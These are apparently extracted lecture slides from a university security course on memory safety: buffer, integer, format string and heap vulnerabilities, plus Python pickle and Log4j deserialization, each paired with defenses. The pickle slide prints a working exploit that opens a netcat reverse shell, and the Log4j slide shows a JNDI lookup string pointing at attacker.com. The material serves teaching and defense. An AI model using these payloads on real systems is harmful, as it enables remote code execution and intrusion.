Memory Safety Vulnerabilities

CS 161 Spring 2022 - Lecture 4

Computer Science 161

Nicholas Weaver

Announcements

• Homework 1 is due Friday, January 28th, 11:59 PM PT
• Project 1 is released
• Checkpoint is due Friday, February 4th, 11:59 PM PT
• Final submission is due Friday, February 18th, 11:59 PM PT
• Discussion sections begin this week
• See the calendar for the schedule

2

Computer Science 161

Nicholas Weaver

Last Time: Buffer Overflows

• Buffer overflows: An attacker overwrites unintended parts of memory
• Stack smashing: An attacker overwrites saved registers on the stack
• Overwriting the RIP lets the attacker redirect program execution to shellcode

3

Computer Science 161

Nicholas Weaver

Memory-Safe Code

4

Computer Science 161

Nicholas Weaver

Still Vulnerable Code?

5

void vulnerable?(void) {

char *name = malloc(20);

...

gets(name);

...

}

Computer Science 161

Nicholas Weaver

Solution: Specify the Size

6

void safe(void) {

char name[20];

...

fgets(name, 20, stdin);

...

}

Warning: Different functions take slightly different parameters

Computer Science 161

Nicholas Weaver

Solution: Specify the Size

7

void safer(void) {

char name[20];

...

fgets(name, sizeof(name), stdin);

...

}

Computer Science 161

Nicholas Weaver

Vulnerable C Library Functions

• gets - Read a string from stdin
• Use fgets instead
• strcpy - Copy a string
• Use strncpy (more compatible, less safe) or strlcpy (less compatible, more safe) instead
• strlen - Get the length of a string
• Use strnlen instead (or memchr if you really need compatible code)
• sprintf - Formatted writing to strings
• Use snprintf
• … and more (look up C functions before you use them!)

8

Computer Science 161

Nicholas Weaver

Integer Memory Safety Vulnerabilities

9

Textbook Chapter 3.4

Computer Science 161

Nicholas Weaver

Signed/Unsigned Vulnerabilities

10

void func(int len, char *data) {

char buf[64];

if (len > 64)

return;

memcpy(buf, data, len);

}

void *memcpy(void *dest, const void *src, size_t n);

Is this safe?

Computer Science 161

Nicholas Weaver

Signed/Unsigned Vulnerabilities

11

void safe(size_t len, char *data) {

char buf[64];

if (len > 64)

return;

memcpy(buf, data, len);

}

Now this is an unsigned comparison, and no casting is necessary!

Computer Science 161

Nicholas Weaver

Integer Overflow Vulnerabilities

12

void func(size_t len, char *data) {

char *buf = malloc(len + 2);

if (!buf)

return;

memcpy(buf, data, len);

buf[len] = '\n';

buf[len + 1] = '\0';

}

Is this safe?

What happens if len == 0xffffffff?

Computer Science 161

Nicholas Weaver

Integer Overflow Vulnerabilities

13

void safe(size_t len, char *data) {� if (len > SIZE_MAX - 2)

return;

char *buf = malloc(len + 2);

if (!buf)

return;

memcpy(buf, data, len);

buf[len] = '\n';

buf[len + 1] = '\0';

}

Computer Science 161

Nicholas Weaver

Integer Overflows in the Wild

14

Computer Science 161

Nicholas Weaver

Integer Overflows in the Wild

• 32,000 votes is very close to 32,768, or 2¹⁵ (the article probably rounded)
• Recall: The maximum value of a signed, 16-bit integer is 2¹⁵ - 1
• This means that an integer overflow would cause -32,768 votes to be counted!
• Takeaway: Check the limits of data types used, and choose the right data type for the job
• If writing software, consider the largest possible use case.
• 32 bits might be enough for Broward County but isn’t enough for everyone on Earth!
• 64 bits, however, would be plenty.

15

Computer Science 161

Nicholas Weaver

Another Integer Overflow in the Wild

16

Computer Science 161

Nicholas Weaver

How Does This Vulnerability Work?

• The entire kernel (operating system) patch:�– if (len > PAGE_SIZE - 2 - size)�+ if (size + len + 2 > PAGE_SIZE)� return invalf(fc, "VFS: Legacy: Cumulative options too large)
• Why is this a problem?
• PAGE_SIZE and size are unsigned
• If size is larger than PAGE_SIZE…
• …then PAGE_SIZE - 2 - size will trigger a negative overflow to 0xFFFFFFFF
• Result: An attacker can bypass the length check and write data into the kernel

17

Yes, not a blue slide!

Computer Science 161

Nicholas Weaver

Format String Vulnerabilities

18

Textbook Chapter 3.3

Computer Science 161

Nicholas Weaver

Review: printf behavior

• Recall: printf takes in a variable number of arguments
• How does it know how many arguments that it received?
• It infers it from the first argument: the format string!
• Example: printf("One %s costs %d", fruit, price)
• What happens if the arguments are mismatched?

19

Computer Science 161

Nicholas Weaver

Review: printf behavior

20

void func(void) {

int secret = 42;

printf("%d\n", 123);

}

printf assumes that there is 1 more argument because there is one format sequence and will look 4 bytes up the stack for the argument

What if there is no argument?

arg0

arg1

Computer Science 161

Nicholas Weaver

Review: printf behavior

21

void func(void) {

int secret = 42;

printf("%d\n");

}

Because the format string contains the %d, it will still look 4 bytes up and print the value of secret!

arg0

arg1

Computer Science 161

Nicholas Weaver

Format String Vulnerabilities

22

char buf[64];

​

void vulnerable(void) {

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

What is the issue here?

Computer Science 161

Nicholas Weaver

Format String Vulnerabilities

• Now, the attacker can specify any format string they want:
• printf("100% done!")
• Prints 4 bytes on the stack, 8 bytes above the RIP of printf
• printf("100% stopped.")
• Print the bytes pointed to by the address located 8 bytes above the RIP of printf, until the first NULL byte
• printf("%x %x %x %x ...")
• Print a series of values on the stack in hex

23

char buf[64];

​

void vulnerable(void) {

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Computer Science 161

Nicholas Weaver

Format String Vulnerability Walkthrough

24

Note that strings are passed by reference in C, so the argument to printf is actually a pointer to buf, which is in static memory.

char buf[64];

​

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Computer Science 161

Nicholas Weaver

Format String Vulnerability Walkthrough

25

Input: %d%s

char buf[64];

​

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Output:

​

We’re calling printf("%d%s"). printf reads its first argument (arg0), sees two format specifiers, and expects two more arguments (arg1 and arg2).

arg0

arg1

arg2

Computer Science 161

Nicholas Weaver

Format String Vulnerability Walkthrough

26

Input: %d%s

char buf[64];

​

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Output:

42

The first format specifier %d says to treat the next argument (arg1) as an integer and print it out.

arg0

arg1

arg2

Computer Science 161

Nicholas Weaver

Format String Vulnerability Walkthrough

27

Input: %d%s

char buf[64];

​

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Output:

42pancake

The second format specifier %s says to treat the next argument (arg2) as an string and print it out.

%s will dereference the pointer at arg2 and print until it sees a null byte ('\0')

arg0

arg1

arg2

Computer Science 161

Nicholas Weaver

Format String Vulnerabilities

• They can also write values using the %n specifier
• %n treats the next argument as a pointer and writes the number of bytes printed so far to that address (usually used to calculate output spacing)
• printf("item %d:%n", 3, &val) stores 7 in val
• printf("item %d:%n", 987, &val) stores 9 in val
• printf("000%n")
• Writes the value 3 to the integer pointed to by address located 8 bytes above the RIP of printf

28

void vulnerable(void) {

char buf[64];

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Computer Science 161

Nicholas Weaver

Format String Vulnerability Walkthrough

29

Input: %d%n

char buf[64];

​

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Output:

​

We’re calling printf("%d%n"). printf reads its first argument (arg0), sees two format specifiers, and expects two more arguments (arg1 and arg2).

arg0

arg1

arg2

Computer Science 161

Nicholas Weaver

Format String Vulnerability Walkthrough

30

Input: %d%n

char buf[64];

​

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Output:

42

The first format specifier %d says to treat the next argument (arg1) as an integer and print it out.

arg0

arg1

arg2

Computer Science 161

Nicholas Weaver

Format String Vulnerability Walkthrough

31

Input: %d%n

char buf[64];

​

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Output:

42

The second format specifier %n says to treat the next argument (arg2) as a pointer, and write the number of bytes printed so far to the address at arg2.

We've printed 2 bytes so far, so the number 2 gets written to secret_string.

arg0

arg1

arg2

Computer Science 161

Nicholas Weaver

Format String Vulnerabilities: Defense

32

void vulnerable(void) {

char buf[64];

if (fgets(buf, 64, stdin) == NULL)

return;

printf("%s", buf);

}

Now the attacker can't make the number of arguments mismatched!

Computer Science 161

Nicholas Weaver

Heap Vulnerabilities

33

Textbook Chapter 3.6

Computer Science 161

Nicholas Weaver

Targeting Instruction Pointers

• Remember: You need to overwrite a pointer that will eventually be jumped to
• Stack smashing involves the RIP, but there are other targets too (literal function pointers, etc.)

34

Computer Science 161

Nicholas Weaver

C++ vtables

• C++ is an object-oriented language
• C++ objects can have instance variables and methods
• C++ has polymorphism: implementations of an interface can implement functions differently, similar to Java
• To achieve this, each class has a vtable (table of function pointers), and each object points to its class’s vtable
• The vtable pointer is usually at the beginning of the object
• To execute a function: Dereference the vtable pointer with an offset to find the function address

35

Computer Science 161

Nicholas Weaver

C++ vtables

36

x is an object of type ClassX.

y is an object of type ClassY.

Heap

Code

ClassX vtable

ClassY vtable

Computer Science 161

Nicholas Weaver

C++ vtables

37

Heap

Code

To call a method of y, first follow a pointer on the heap to find the vtable…

ClassX vtable

ClassY vtable

… then follow a pointer in the vtable to find the instructions of the method.

Computer Science 161

Nicholas Weaver

C++ vtables

38

Suppose one of the instance variables of x is a buffer we can overflow.

Heap

Code

ClassX vtable

ClassY vtable

Computer Science 161

Nicholas Weaver

C++ vtables

39

The attacker controls everything above the instance variable of x on the heap, including the vtable pointer for y.

Heap

Code

ClassX vtable

ClassY vtable

Computer Science 161

Nicholas Weaver

C++ vtables

40

Heap

The vtable for y is now a pointer to shellcode. If method foo for y is called, it will execute shellcode!

Heap

Code

ClassX vtable

ClassY vtable

Computer Science 161

Nicholas Weaver

Heap Vulnerabilities

• Heap overflow
• Objects are allocated in the heap (using malloc in C or new in C++)
• A write to a buffer in the heap is not checked
• The attacker overflows the buffer and overwrites the vtable pointer of the next object to point to a malicious vtable, with pointers to malicious code
• The next object’s function is called, accessing the vtable pointer
• Use-after-free
• An object is deallocated too early (using free in C or delete in C++)
• The attacker allocates memory, which returns the memory freed by the object
• The attacker overwrites a vtable pointer under the attacker’s control to point to a malicious vtable, with pointers to malicious code
• The deallocated object’s function is called, accessing the vtable pointer

41

Computer Science 161

Nicholas Weaver

Use-After-Free in the Wild

42

Computer Science 161

Nicholas Weaver

Most Dangerous Software Weaknesses (2020)

43

Computer Science 161

Nicholas Weaver

Serialization

44

No textbook chapter (yet!)

Computer Science 161

Nicholas Weaver

Serialization in Java and Python

• Memory safety vulnerabilities are almost exclusively in C
• More on memory-safe languages next time
• Java and Python have a related problem: serialization
• Serialization is a huge land-mine that is easy to trigger

45

Computer Science 161

Nicholas Weaver

Log4Shell Vulnerability

46

Computer Science 161

Nicholas Weaver

Using Serialization

• Motivation
• You have some complex data structure (e.g. objects pointing to objects pointing to objects)
• You want to save your program state
• Or you want to transfer this state to another running copy of your program
• Option 1: Manually write and parse a custom file format
• Problem: Ugh, now that is ugly!
• Problem: Extra programming work
• Problem: You may make errors in your parser
• Option 2: Use a serialization library
• Automatically converts any object into a file (and back)
• Example: serialize is a built-in Java function
• Example: pickle is a built-in Python library

47

Computer Science 161

Nicholas Weaver

Serialization Vulnerabilities in pickle (Python)

• Serialization libraries can load and save arbitrary objects
• Arbitrary objects might contain code that can be executed (e.g. functions)
• What if the attacker provides a malicious file to be deserialized?
• The victim program loads a serialized file from the attacker
• When deserializing the object, the code from the attacker executes!

48

Computer Science 161

Nicholas Weaver

A pickle (Python) exploit: Yes, it's that easy!

import pickle, base64, os��class RCE:� def __reduce__(self):� cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | '� '/bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f')� return os.system, (cmd,)��if __name__ == '__main__':� # Saves the hostile object as a pickled string� pickled = pickle.dumps(RCE())� # encodes this for the particular target program which expects a� # base64 encoded object.� print(base64.urlsafe_b64encode(pickled))

49

Computer Science 161

Nicholas Weaver

Serialization Vulnerabilities in Java

• Exploiting serialization is a little harder in Java
• The latest Java includes some protections
• Deserialized code is not allowed to call certain libraries
• Example: Don't allow a deserialized object to invoke java.lang.Runtime and call exec (which can execute arbitrary programs)
• Sometimes called a denylist or blacklist, as we'll see later
• Problem: Denylists are brittle
• If you forget to include a dangerous library in your list, attackers can exploit it
• Attackers have automated tools to exploit this
• Take a common runtime, find snippets of code (“gadgets”) that can be executed, and chain a series of snippets together to create a larger exploit
• Example: “ysoserial”

50

Computer Science 161

Nicholas Weaver

Log4j

• Logging: Recording information
• Being a good programmer, you want to record things that happen
• Log4j: A very common Java framework for logging information
• Even if your Java code doesn’t use Log4j, you may be importing some third-party code that uses it
• Unfortunately, there was a bug added…

51

Computer Science 161

Nicholas Weaver

Log4j and JNDI (Java Naming & Directory Interface)

• JNDI (Java Naming & Directory Interface): A service to fetch data from outside places (e.g. the Internet)
• Log4j has a pretty powerful format string parser
• After the logged string is fully created, Log4j parses the format strings again
• Suppose Log4j saw the string ${jndi:ldap://attacker.com/pwnage}
• Log4j thinks: “This is a JNDI object I need to include’
• Java thinks: “Okay, let’s get that object from attacker.com”
• Java thinks: “Okay, let’s deserialize that Java object”
• Takeaway: Because a logged string included a reference that Java fetches from the network and deserializes, the attacker can use it to exploit programs!
• Anyone want a Log4j exploiting QR code T-shirt?

52

Computer Science 161

Nicholas Weaver

Serialization: Detection and Defenses

• Look for serialize in Java and pickle in Python
• Can an attacker ever provide input to these functions?
• Example: If the code runs on your server and you accept data from users, you should assume that the users might be malicious
• Refactor the code to use safe alternatives
• JSON (Java Script Object Notation)
• Protocol buffers

53

Computer Science 161

Nicholas Weaver

Summary: Memory Safety Vulnerabilities

• Buffer overflows: An attacker overwrites unintended parts of memory
• Stack smashing: An attacker overwrites saved registers on the stack
• Memory-safe code: Using safer function calls to avoid buffer overflows
• Integer memory safety vulnerabilities: An attacker exploits how integers are represented in C memory
• Format string vulnerabilities: An attacker exploits the arguments to printf
• Heap vulnerabilities: An attacker exploits the heap layout
• Serialization vulnerabilities: An attacker provides a malicious object to be deserialized

54

Computer Science 161

Nicholas Weaver